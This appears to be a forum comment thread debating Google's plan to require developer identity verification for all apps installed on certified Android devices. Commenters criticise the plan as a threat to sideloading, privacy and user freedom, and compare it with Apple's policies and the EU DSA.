It absolutely does. Quoting from Google:
>Starting next year, Android will require all apps to be registered by verified developers in order to be installed by users on certified Android devices.
certified Android devices being... 99.9% of all Android devices in existence.
https://android-developers.googleblog.com/2025/08/elevating-...
It's not a massive privacy breach. If you are so anti-Google yet use their devices then most likely you're already only distributing to GrapheneOS or LineageOS anyway. For most people who already have a Google account this is a very small bar to clear.
Getting a DUNS number is ass, getting the 20 testers is ass, etc etc.
I do not want to give Google my government ID to write a shitty little app that only my family will use, or only close friends use and it gets sideloaded through sending it on chat. I do not want people making apps to skip ads on YouTube giving out their government ID. I do not want people making apps that might get them in trouble with their government to give out their government ID to Google.
Hong Kong protestors bought Android phone en masse when Apple removed apps they used to fight back on Chinese censorship, if Google is allowed to do the same you can say goodbye to freedom of information in many countries. You’re focusing on revanced when it’s the least of the issue.
https://calyxos.org/news/2025/08/01/a-letter-to-our-communit...
It does have an Android subsystem stuck on, but it's not necessary.
Ok, but what's the real damage? In other words, how many installs and how much money siphoned from users and legit apps?
"You'll need to prove you own your apps by providing your app package name and app signing keys."
That is capital-I Insane.
[1] https://developer.android.com/developer-verification
Someone elsewhere in the thread said this is how F-Droid works, but I can't confirm firsthand.
The only credible explanation I can come up with is that they need the keys in order to produce indistinguishably backdoored versions of applications, handy for tools like signal.
Otherwise one would never think of requesting the private keys-- if google wants to rebuild apps themselves they could sign with their own keys and possessing anyone elses private key is just pure liability as if there is any discovered abuse they can't show that they weren't the vector.
I'm cancelling my Pixel 10 preorder.
One thing that annoys me is that a lot of F-Droid apps are obviously naive ports with overbroad permissions like "can read the entirety of storage", but that's still better than the all-consuming Goo.
"Would?" Google has zero incentive to do that.
Will there be a local override?
GrapheneOS won't survive the next generation of devices because bootloader unlocking will also go away (https://news.ycombinator.com/item?id=44765939), and without kernel security updates that OS can't continue.
Now there's also no more sideloading, so what purpose does Android even serve anymore?
The comment in the thread you linked directly contradicts the claim that "bootloader unlocking will also go away".
iOS does a tremendous amount of data collection including for the usage of ads as per Apple's privacy policy. All the same types of data that stock Android collects, even.
You may believe Apple is a generally better steward of that data than Google, but using iOS does not reduce the amount of data being hoovered up in any meaningful capacity.
> Now there's also no more sideloading, so what purpose does Android even serve anymore?
I hate this change, but I still prefer Android. iOS is hardly perfect nor does it do everything better...
Can you download, build, and install a basic Android system these days without touching a single piece of closed code? Absolutely. Will it be able to do much without closed binaries? No.
Android isn't GNU/Linux where there's a general ethos of making everything in userland FOSS if at all possible. Rather, it's a free OS that both Google and manufacturers can do anything they want with, including shove a ton of spy and bloatware on it, then make it to where you can't get rid of those things, at least not easily.
The optimism from 15 years ago surrounding FOSS in the mobile space is on its deathbed.
Because Google-free AOSP-derived Android distributions are far more versatile, offer far more freedom, impose far fewer restrictions and tend to end up being far less expensive than whatever the fruit factory decides their dedicants have to use today. If Google goes the way of the fruit folks and AOSP no longer offers these freedoms the next step is not to surrender to the Church of Apple but to find a way to evade those restrictions.
I’m hoping that projects like Precursor can take off because we’ve buried ourselves in such mountain of complexity that seems like only a billion/trillion dollar big tech company can make an OS.
But then again, some body called BS on browsers and we might have a good option soon in Ladybug!
https://www.crowdsupply.com/sutajio-kosagi/precursor
Google don't even expose a per-app toggle for app Internet access, why am I surprised?
This is disgusting.
Freedom died a little bit more today.
Why is end-user choice and consent not considered?
It's really disturbing that the EU and Google would do this.
I can't recommend Android or iPhone because of this nonsense.
The elimination of user choice was very much considered. In fact, it's the primary goal.
I think that is a yes, it will affect Samsung
> our recent analysis found over 50 times more malware from internet-sideloaded sources than on apps available through Google Play.
I will believe this when we stop seeing brazen malware in marquee app store apps, e.g. https://www.tracesecurity.com/blog/articles/meta-pixel-and-t...
Personally: I don't use Apple because I like being able to whip together little apps to side-load without having to check in with a walled-garden mothership. If Google is going to move closer to Apple in that regard... Apple's UX ecosystem is better, so I have far fewer reason to keep using Android.
Damn the future sucks ass.
Alternatively, and that’s almost bullshit, the dumb phone trend continues and we might get devices like PDAs. Get a dumb phone and a small camera and then your PDA for everything that is essentially an app. Not sure what OS they’d run but I don’t see another way.
As long as they still allow running stuff inside of apps like that I will probably not abandon ship yet.
If they keep up this "boil the frog slowly" crap though, I may be migrating off of Android and over to a strictly Linux-based phone, like a PinePhone, Librem, etc.
Fuck the scumbags at the top of big tech making decisions like these.
I have no words.. or more precisely, those words are not the kind of words I'm allowed to write here.
[1] https://github.com/popcorn-official/popcorn-android
« Développer will have freedom » yet they are entitled to Google’s verification.
It’s just another stone in the grave of Android and even though I shipped off this sinking ship 6 years ago to iOS, this is still concerning because ultimately apple’s IOS is in competition solely with Android.
If Android gets so bad it has all the disadvantage of iOS, some more, for instance with the embedded spyware that manufacturer are paid to include, and none of the good side of iOS, then everyone lose. Apple doesn’t have to compete anymore, they just have to not suck.
With a free apple ID (no additional registration needed) you can also install your compiled iOS app on your iPhone and have it working for 7 days before you need to re-install it.
was a reason I bought Android. will they be sending me a refund?
This combined with the 'age verification' coming to all Google properties means it is a very small step from that new world to full Google verification of everything you visit and everything on your device, at any time, for any reason with the penalty being incontestable ban from your device, apps and data.
Get ready for facebook style 'we are interrupting you for a video selfie because we have detected you are a threat' across all google properties (Android, Chrome, Gmail, Maps...).
Move to linux phones, now.
- money - tickets - identification
They cannot force everyone to own and buy a phone.
> Starting next year, Google will begin to verify the identities of developers distributing their apps on Android devices, not just those who distribute via the Play Store.
Odd little phrase, "distributing their apps on Android devices".
I think "distributing" in this context is in the sense of product distribution, not in the sense of distributed systems.
But "distributing...on" sounds a little odd, like Google is still providing a distribution service. (Contrary to all the precedent of how we've thought of installing software, other than the proprietary, captive-user app stores.)
And so, maybe "distributing...on" makes it sound more like Google is (once again) entitled to gatekeep what you can run on your device/computer.
> However, developers who appreciated the anonymity of alternative distribution methods will no longer have that option. Google says this will help to cut down on bad actors who hide their identity to distribute malware, commit financial fraud, or steal users’ personal data.
Maybe it's not "developers who appreciated the anonymity" (which we immediately try to conflate with bad actors), but that the whole point lately has been to stop the greedy proprietary lock-in app store monopolies, and not have them gatekeeping what everyone else can do.
I doubt I'll move away from Android too soon, but that definitely makes me reconsider whether any Google services have a right to CPU time on my device.
More and more locked down devices, Android source releases only being published once a year, device drivers for reference devices disappearing, and now, verification of all your software for your "security". The war on general computing is well and truly on.
What the absolute fuck.
It’s sad that smartphones now hold so much personal and private data but aren’t really under the control of their users.
They already have a version of that - it's called Windows S Mode (Windows Store apps only, no EXEs or scripts, Edge only for browsing). If they get away with it, they would make it the default. Required Microsoft accounts was a step in that direction.
It will happen. We've been the frogs boiled in the pot for years, accepting forced attestation. Eventually they'll close off running unsigned code, and the PCs will probably have bootloaders locked to Windows as well, so you can't escape.
I find it hard to state how contemptible this is. How stupid. Everyone who worked on this has blood on their hands.
Break them up already, it's getting old.
not even to mention the h1b indian kickback stuff that's about to hit them. couldn't happen to a nicer company.
What a fucking joke.
In my case I keep a copy of K9 Mail 5.6 with the original UI (the reason I choose K9) and I sideload it to every device of mine. I'm afraid that I'll have to register an account and what, claim that that K9 is mine?
Apple implemented a similar change for the EU App Store earlier this year to comply with the Digital Services Act (DSA), a regulation that now requires app developers to provide their “trader status” to submit new apps or app updates for distribution.
For the record, Apple notes that the DSA requirements only impact developers distributing through the App Store, not through alternative distribution [1].
[1]: https://developer.apple.com/help/app-store-connect/manage-co...
I.e. it doesn't require this at all, it merely requires Google require verification for apps that they themselves distribute. What they've been doing all along until now plus or minus minor bookkeeping details on what data they collect.
That is most apps - but not the kind of apps Google is attacking here (personal-scale, actually-free, third-party, etc.). And "apps that are not monetized" is actually a very nice thing to filter for from a user perspective.
Of course, the world's largest malware vendors love to use government action as an excuse to do something else malicious.
Users should be allowed to brick their device if they're sufficiently stupid, but I feel bad for Google who has to deal with some of those people blaming them.
To whatever extent Google may be responding to an issue arising from the market, it is likely at the behest of large companies, especially payment processors, payment card networks, banks, etc. These institutions lately have begun to exert increasing influence over end-user activities, and it would not surprise me if they are playing a part here, too.
My position is that this is not the OS vendor's responsibility to prevent. A warning is fine. A scan for known malware by default is fine. Beyond that, it's my device and it's my choice to get software from wherever I damn well please even if it might be a bad idea.
The biggest difference these days is most folks don't even use a personal computer.
And besides if you really want to combat fraud stop using creditcards for fuck sake and make a modern payment system that doesn't rely on 1970s technology.
This trust me bro, our App Store is safer is just getting on my nerves. Every day we get malware popping on both app stores.
Time to switch